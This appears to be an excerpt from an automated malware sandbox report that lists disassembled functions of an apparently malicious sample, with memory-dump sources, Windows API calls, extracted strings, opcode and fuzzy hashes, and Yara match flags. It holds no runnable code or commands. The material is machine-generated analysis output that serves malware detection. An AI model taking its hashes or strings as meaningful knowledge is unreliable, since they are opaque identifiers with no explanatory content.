                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Qsl-$_
                                                                                                                                                                                                              • API String ID: 0-1600642271
                                                                                                                                                                                                              • Opcode ID: ec5924e09fc4d67174d26ce30b1d0df2b351461dec4f276fa379d049dea5689d
                                                                                                                                                                                                              • Instruction ID: 20ee3995e4d363dbe253048fe7eb1ce5114e80e2a53dd3e1d9f86f056f468a5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec5924e09fc4d67174d26ce30b1d0df2b351461dec4f276fa379d049dea5689d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89D16C72508312CBC314CF28C8916ABB7E2FFD8764F194A2DE4D5873A1EB789945CB46
                                                                                                                                                                                                              Function 024A8A07 Relevance: 6.9, Strings: 5, Instructions: 615COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: jW}U$jW}U$jW}U$jW}U$klm"
                                                                                                                                                                                                              • API String ID: 0-3698230354
                                                                                                                                                                                                              • Opcode ID: d5a671fae79bd4573deda153c14516211366adf218943a13afc897b99cfd4215
                                                                                                                                                                                                              • Instruction ID: 8de21d82b951a7e2f0b41576c6d03bba5c1e8b5d4acbeb0e33ba802b5f3cc662
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5a671fae79bd4573deda153c14516211366adf218943a13afc897b99cfd4215
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA0255767083058BC718DE28CCA166BF7E3EBE4324F19853EE9959B391DB749C058B81
                                                                                                                                                                                                              Function 0043E462 Relevance: 5.6, Strings: 4, Instructions: 641COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: BC$PC$RC$RC
                                                                                                                                                                                                              • API String ID: 0-3968095935
                                                                                                                                                                                                              • Opcode ID: ca3109897646c287c122303a40b6b1a6e9f93aaaaebedb631e7ad76c8a184b41
                                                                                                                                                                                                              • Instruction ID: 7ac36759e6bc2067f9851ab906895681b53bc023137267b47368044ca0750fcb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca3109897646c287c122303a40b6b1a6e9f93aaaaebedb631e7ad76c8a184b41
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C212CF39609351CFCB08CF28E89026BB7E2FB8A315F0A987DD586873A1D7349C55DB49
                                                                                                                                                                                                              Function 02488284 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 314COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,FFFFFFFC,00000000,00000000,?), ref: 02488622
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                              • String ID: Qsl-$_
                                                                                                                                                                                                              • API String ID: 237503144-1600642271
                                                                                                                                                                                                              • Opcode ID: 2a840f89eaa6ca3a4a0e9b73973b5aba154f95eec31a736a808cd1f070841a46
                                                                                                                                                                                                              • Instruction ID: d9db9da5cf67b25c25701a0dc30e5f709ca504dde2a5bfd25faaed9c29fbaa2d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a840f89eaa6ca3a4a0e9b73973b5aba154f95eec31a736a808cd1f070841a46
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CB139726183128BC324DF28C8D166BB7E2FFC8754F194A2DE4C58B3A5E7749945CB42
                                                                                                                                                                                                              Function 0042834B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,00000000), ref: 004283A9
                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,Function_000283AF,00000000), ref: 004283D2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                              • String ID: 6
                                                                                                                                                                                                              • API String ID: 237503144-1604402223
                                                                                                                                                                                                              • Opcode ID: dc86054a4e8c55995a5065440fde4f1677d07b85531c458a1b0ec8307a5aadac
                                                                                                                                                                                                              • Instruction ID: bc2542648b1c931997f5a2168d036cbcb80b64d49cf0a2473f647a8892e0a40f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc86054a4e8c55995a5065440fde4f1677d07b85531c458a1b0ec8307a5aadac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0071347665C3218BE314CF28DC4235FB7E5EBC5314F46893DE9A5DB281EA78C9068782
                                                                                                                                                                                                              Function 004093A0 Relevance: 5.4, Strings: 4, Instructions: 396COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $&&$1$5FOLF4208$_
                                                                                                                                                                                                              • API String ID: 0-2588491210
                                                                                                                                                                                                              • Opcode ID: e93672011a221c3cdf1e16cf5edfa4abda24ce27ab93b942004af95bc440538f
                                                                                                                                                                                                              • Instruction ID: 66562a0f172ef5592bf4521cef27fc3876f5cdf2f3030e77cfe98d9d0281f343
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e93672011a221c3cdf1e16cf5edfa4abda24ce27ab93b942004af95bc440538f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17B1D27264C3818BD322CF79989076BFFE1AFD6204F08496DE4D15B382D779890AC75A
                                                                                                                                                                                                              Function 0247ACE7 Relevance: 5.4, Strings: 4, Instructions: 380COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $%$)$NM$wxV
                                                                                                                                                                                                              • API String ID: 0-3516447337
                                                                                                                                                                                                              • Opcode ID: 74f5da1f06c484242d97056641aec6a1dc58d8705af01a542a9dc8ac132426db
                                                                                                                                                                                                              • Instruction ID: a24167ede9d088445ad8917bb5a920a62fd38c5ef0e4eb74be6490b8f8a76881
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74f5da1f06c484242d97056641aec6a1dc58d8705af01a542a9dc8ac132426db
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20C1FB7160C3A08BD725CF2484502AFFBE6EFD1348F19892EE8E65B381D7359506CB82
                                                                                                                                                                                                              Function 0040AA80 Relevance: 5.4, Strings: 4, Instructions: 380COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $%$)$NM$wxV
                                                                                                                                                                                                              • API String ID: 0-3516447337
                                                                                                                                                                                                              • Opcode ID: 0a84b0c443054bd755d7ff541dfc6040a09f6deb789e53469a61a654adad1f8b
                                                                                                                                                                                                              • Instruction ID: c1f7124957a99eebc59de83fb2fc256800c39626e3da80d104817e16e2d79d86
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a84b0c443054bd755d7ff541dfc6040a09f6deb789e53469a61a654adad1f8b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CDC1E37120C3518BD728DF24845166FFBE3AFD2304F18893EE9D66B381D639891A8797
                                                                                                                                                                                                              Function 0043302F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4116985748-3916222277
                                                                                                                                                                                                              • Opcode ID: bfa92081d552d46c5b5ed061a959b3d0b8a52237fc2ca5e1ac406680ae8c337c
                                                                                                                                                                                                              • Instruction ID: 1a725bf265ef23b5b8198cb8e3792de0ed767513a01766cc17b37cfa0a6de957
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfa92081d552d46c5b5ed061a959b3d0b8a52237fc2ca5e1ac406680ae8c337c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F31C3B49143148FDB00EF68DA85619BBF4BF89304F51856EF498DB361D7B4A948CF82
                                                                                                                                                                                                              Function 004268B3 Relevance: 4.8, APIs: 3, Instructions: 276COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 451b179e00c0dd842f4b4b6de9d917aa242e015eef5915d20adbb1bfc225a655
                                                                                                                                                                                                              • Instruction ID: 56608c14112239bfd3609a2b4b2a690242fda66f1e02c9f66821879a6b8ed47e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 451b179e00c0dd842f4b4b6de9d917aa242e015eef5915d20adbb1bfc225a655
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0A133B67083509BD3249F28A84175FB7E1FBC6320F164A3EE4D997290DB75D8058B4B
                                                                                                                                                                                                              Function 00414C22 Relevance: 4.5, Strings: 3, Instructions: 727COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: D]+\$FOA$ZUA
                                                                                                                                                                                                              • API String ID: 0-2438413873
                                                                                                                                                                                                              • Opcode ID: a98869d0b1ef18cc8a941e917dbd30b9c0812d86251d33d0fa12982058dc780b
                                                                                                                                                                                                              • Instruction ID: 62a76922e196af75952f1064b278b52b0ba789a9bcb6b442db0e89498e3dd918
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a98869d0b1ef18cc8a941e917dbd30b9c0812d86251d33d0fa12982058dc780b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B222053A318600DFDB089F24DC82BABB7E1EB9A314F14543DF58497392D3789C569B86
                                                                                                                                                                                                              Function 0043BAC0 Relevance: 4.4, Strings: 3, Instructions: 652COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID: f$sppv$s@
                                                                                                                                                                                                              • API String ID: 2994545307-19717636
                                                                                                                                                                                                              • Opcode ID: a4efe95d48931c7409c4081da09a046373c78476e3819c663d76cb791361fc48
                                                                                                                                                                                                              • Instruction ID: 787b616af623d5ee637097c6b1cdf093cd7bb909f6bbe6dcdb4d5c9adc9c9f7c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4efe95d48931c7409c4081da09a046373c78476e3819c663d76cb791361fc48
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A22F4766083418FD714CF29C88076BB7E2EBCD314F199A2DE5D497392DB78AC058B86
                                                                                                                                                                                                              Function 02479607 Relevance: 4.1, Strings: 3, Instructions: 396COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $&&$1$_
                                                                                                                                                                                                              • API String ID: 0-941065778
                                                                                                                                                                                                              • Opcode ID: e93672011a221c3cdf1e16cf5edfa4abda24ce27ab93b942004af95bc440538f
                                                                                                                                                                                                              • Instruction ID: 498329c53328041a56ac0b37a9a2683778c9d537bc744a3cebbac20b3f573271
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e93672011a221c3cdf1e16cf5edfa4abda24ce27ab93b942004af95bc440538f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24B1D1B164C3C18BD326CF2988907ABFFE1AFD6204F09596DE4E19B342D379850AC756
                                                                                                                                                                                                              Function 024A7857 Relevance: 4.1, Strings: 3, Instructions: 354COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: jW}U$jW}U$jW}U
                                                                                                                                                                                                              • API String ID: 0-3254358678
                                                                                                                                                                                                              • Opcode ID: c3b7aa89e0e4e1dedb25a883dd9f29b199e5e8b91a02ae8f2b00496de71f4dc2
                                                                                                                                                                                                              • Instruction ID: dd78e8fe5c205553c8c8cb82456099ea1ae6f4aae60831b9d1dea5bde461ea50
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3b7aa89e0e4e1dedb25a883dd9f29b199e5e8b91a02ae8f2b00496de71f4dc2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3CC15933A0C7508FD3248A7C89A125FFBD2ABE9228F1D472EE4E5973D1D6748845C786
                                                                                                                                                                                                              Function 00438360 Relevance: 4.1, Strings: 3, Instructions: 350COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: jW}U$jW}U$jW}U
                                                                                                                                                                                                              • API String ID: 0-3254358678
                                                                                                                                                                                                              • Opcode ID: c9caf6fde8909fb7bb85d98b4cc1c84df2f6b55c0dc600745dc04fbd427e5b2e
                                                                                                                                                                                                              • Instruction ID: 37746d80a70663692048baf4ee6fe8321a7ad46c1a7c511b01894b9e5bf896c0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9caf6fde8909fb7bb85d98b4cc1c84df2f6b55c0dc600745dc04fbd427e5b2e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DB16976618305CFC7189F68DC8222BF3E1FB98314F19583DE9859B391EB789C059B89
                                                                                                                                                                                                              Function 0248F3A7 Relevance: 4.0, Strings: 3, Instructions: 258COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $%$IK$MO
                                                                                                                                                                                                              • API String ID: 0-1999044475
                                                                                                                                                                                                              • Opcode ID: 6e8691a83a762d502c4e2e5ca3d76ad771d1a0a9c019d6b82ad4eb7e55f4db16
                                                                                                                                                                                                              • Instruction ID: 27a1ca15e62ca93b784eecba1e15d1dd760c5572cf900d52e45b77e3586dfd61
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e8691a83a762d502c4e2e5ca3d76ad771d1a0a9c019d6b82ad4eb7e55f4db16
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 498112B6A683808FD714DF6ACC405AFBBE6EBC6310F08C92DE5948B254D739C9058B42
                                                                                                                                                                                                              Function 0247092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                              • API String ID: 0-2784972518
                                                                                                                                                                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                              • Instruction ID: 2ba03358afb4aa586080315134d9a6fa806d0697afe7ce4ec3d947c4ea805d1a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB3147B6911609DFDB10CF99C880AEEBBF9FF48324F15504AD851A7310D771EA45CBA4
                                                                                                                                                                                                              Function 02487ED3 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 328COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 024881E8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                              • String ID: %~
                                                                                                                                                                                                              • API String ID: 237503144-513252899
                                                                                                                                                                                                              • Opcode ID: adaefb5303bf28e9b096e1c66527fa84d42ce96875534b28df2d1414ac5fa266
                                                                                                                                                                                                              • Instruction ID: fea1d81297fe79688081851a149d4a4ad30f2174c77cc31af4a25a20130da0be
                                                                                                                                                                                                              • Opcode Fuzzy Hash: adaefb5303bf28e9b096e1c66527fa84d42ce96875534b28df2d1414ac5fa266
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE911175A183218BC324DF25C8906ABB7E2EFD9314F19992DE8CA5B754E7749841CB01
                                                                                                                                                                                                              Function 00417C6C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 328COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417F81
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                              • String ID: %~
                                                                                                                                                                                                              • API String ID: 237503144-513252899
                                                                                                                                                                                                              • Opcode ID: adaefb5303bf28e9b096e1c66527fa84d42ce96875534b28df2d1414ac5fa266
                                                                                                                                                                                                              • Instruction ID: b28b82fec4c273a5bd11cfdc4352db29561c123092d2f2c543df844c55f915a1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: adaefb5303bf28e9b096e1c66527fa84d42ce96875534b28df2d1414ac5fa266
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88914371A083218BC324CF24C8906BBB7F2EFD9360F19992DE8C95B754E7789981C746
                                                                                                                                                                                                              Function 0249C594 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 193COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: h
                                                                                                                                                                                                              • API String ID: 3664257935-2439710439
                                                                                                                                                                                                              • Opcode ID: 7a638dbd4f6341260a0b343d18183f4dfcf6662349f5f3a65a3bc0c4632adb7f
                                                                                                                                                                                                              • Instruction ID: 194f1f986705d39e05067962d60306051df70e7ef43b4e70e723bd87ebf20ba1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a638dbd4f6341260a0b343d18183f4dfcf6662349f5f3a65a3bc0c4632adb7f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4415672A0C3918FD3158F25C8A0B6BBFD2AFE6305F18586EE4D69B391D7348805CB52
                                                                                                                                                                                                              Function 0042C32D Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 193COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: h
                                                                                                                                                                                                              • API String ID: 3664257935-2439710439
                                                                                                                                                                                                              • Opcode ID: 7b5117faaad9ab62abe7c7747b2807ffbbce372d955378fdbcd7e496c484446d
                                                                                                                                                                                                              • Instruction ID: b7ed13841b3ed3e3dae911fd69fbb5de791276912ac4813f0da7813bc9d33e52
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b5117faaad9ab62abe7c7747b2807ffbbce372d955378fdbcd7e496c484446d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F417CB2A0C3918BD315DF259C9176BBFD2AFE6304F28481DE4D55B391D6388805CB97
                                                                                                                                                                                                              Function 024A99B7 Relevance: 3.6, Strings: 1, Instructions: 2328COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: #Cp
                                                                                                                                                                                                              • API String ID: 0-1859763496
                                                                                                                                                                                                              • Opcode ID: 61a1fe6748ad5f59d2a0296a15b8624181594235dc00955c07ac8bdb611d6f56
